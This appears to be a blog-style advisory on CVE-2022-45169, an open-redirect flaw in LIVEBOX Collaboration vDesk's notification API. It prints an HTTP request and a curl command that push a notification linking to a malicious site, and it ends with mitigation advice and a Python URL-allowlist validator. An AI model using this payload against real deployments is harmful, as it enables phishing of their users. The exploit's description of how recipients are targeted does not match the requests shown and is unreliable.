A security vulnerability, identified as CVE-2022-45169, has been discovered in LIVEBOX Collaboration vDesk (versions up to v031). The flaw allows URL redirection to an untrusted site (open redirect) via the /api/v1/notification/createnotification endpoint. As an authenticated user, you can send an arbitrary push notification to any other user of the system, and that push notification can include an (invisible) clickable link. This post provides code snippets, references to the original sources, and exploit details in simple American English.

Vulnerability Details

The vulnerability exists in the /api/v1/notification/createnotification endpoint within the LIVEBOX Collaboration vDesk application. The endpoint allows authenticated users to create push notifications with embedded clickable links. Due to a lack of validation and filtering, the endpoint can be manipulated to redirect users to malicious websites. This opens a potential gateway for further social engineering or phishing attacks on the targeted user.

For example, the following request demonstrates the vulnerable endpoint:

POST /api/v1/notification/createnotification HTTP/1.1
Host: example.com
Content-Type: application/json
Authorization: Bearer usertoken

{
  "title": "New Document Shared",
  "message": "You have a new document shared with you",
  "url": "http://malicious-site.com"
}

In this request, the attacker-controlled url parameter contains a link to the malicious website. That URL is embedded in the push notification delivered to the targeted user.

Exploiting the Vulnerability

To exploit CVE-2022-45169, you must first authenticate as a user within the LIVEBOX Collaboration vDesk system. Once authenticated, you can use various tools such as curl, Postman, or Burp Suite to craft the malicious push notification containing the untrusted link.

An example exploit using curl may look like the following:

curl -X POST "https://example.com/api/v1/notification/createnotification" \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer usertoken" \
  -d '{ "title": "New Document Shared", "message": "You have a new document shared with you", "url": "http://malicious-site.com" }'

This request sends a push notification, with the malicious URL embedded in it, to any specified user.

Original References

The original reference for this vulnerability is its entry in the CVE List maintained by the MITRE Corporation.

For more information about the LIVEBOX Collaboration vDesk application, you can visit the vendor's official website.

Mitigation and Recommendations

To protect yourself from the CVE-2022-45169 vulnerability, it is essential to regularly update your LIVEBOX Collaboration vDesk application to the latest version. Additionally, be cautious when clicking on links within push notifications and verify the destination URL before opening it.
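On the server side, the root cause described above is a url field that is embedded in a notification without validation. The following is an added example of such a check, written for this post; it is not LIVEBOX's code and not the vendor's actual fix, and the allowlisted hosts are assumptions.

```python
# Added example (not LIVEBOX's code): allowlist check for the "url" field of a
# createnotification-style request, so that only links to known hosts are ever
# embedded in a push notification. Hosts and schemes below are assumptions.
from urllib.parse import urlsplit

ALLOWED_HOSTS = {"example.com", "docs.example.com"}   # assumed allowlist
ALLOWED_SCHEMES = {"https"}                           # no http/javascript/data


def validate_notification_url(url, allowed_hosts=ALLOWED_HOSTS):
    """Return (ok, reason). ok is True only for an absolute https URL whose
    host is on the allowlist; anything else must be rejected, not stored."""
    if not isinstance(url, str) or not url or len(url) > 2048:
        return False, "url missing, empty, or too long"
    # Browsers treat backslashes as slashes and tolerate embedded whitespace;
    # reject both outright rather than trying to normalise them.
    if "\\" in url or any(c in url for c in " \t\r\n"):
        return False, "url contains disallowed characters"
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        # Also rejects scheme-relative links such as "//malicious-site.com".
        return False, "scheme not allowed: %r" % parts.scheme
    if parts.username is not None or parts.password is not None:
        # "https://example.com@malicious-site.com/" hides the real host
        # behind a trusted-looking userinfo component.
        return False, "userinfo not allowed"
    try:
        port = parts.port          # raises ValueError on a malformed port
    except ValueError:
        return False, "invalid port"
    if port not in (None, 443):
        return False, "port not allowed: %r" % port
    host = parts.hostname          # lowercased, no port, no brackets
    if host is None or host not in allowed_hosts:
        # Exact match only: "example.com.malicious-site.com" is not a match.
        return False, "host not in allowlist: %r" % host
    return True, "ok"


if __name__ == "__main__":
    # Constructed sample bodies, modelled on the request shown in this post.
    for body in ({"title": "New Document Shared", "url": "http://malicious-site.com"},
                 {"title": "New Document Shared", "url": "https://docs.example.com/d/1"}):
        print(body["url"], "->", validate_notification_url(body["url"]))
```

The check is deliberately strict (exact host match, https only, standard port only); relax it only by extending the allowlist, never by accepting arbitrary user input.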

Conclusion

CVE-2022-45169 is a critical security vulnerability that affects the LIVEBOX Collaboration vDesk application (up to v031). Exploitation of this vulnerability allows authenticated users to send malicious push notifications containing untrusted links. By staying vigilant and updating your software regularly, you can protect yourself and other users from potential social engineering and phishing attacks.

Timeline

Published on: 02/21/2024 16:15:49 UTC
Last modified on: 03/19/2024 16:48:23 UTC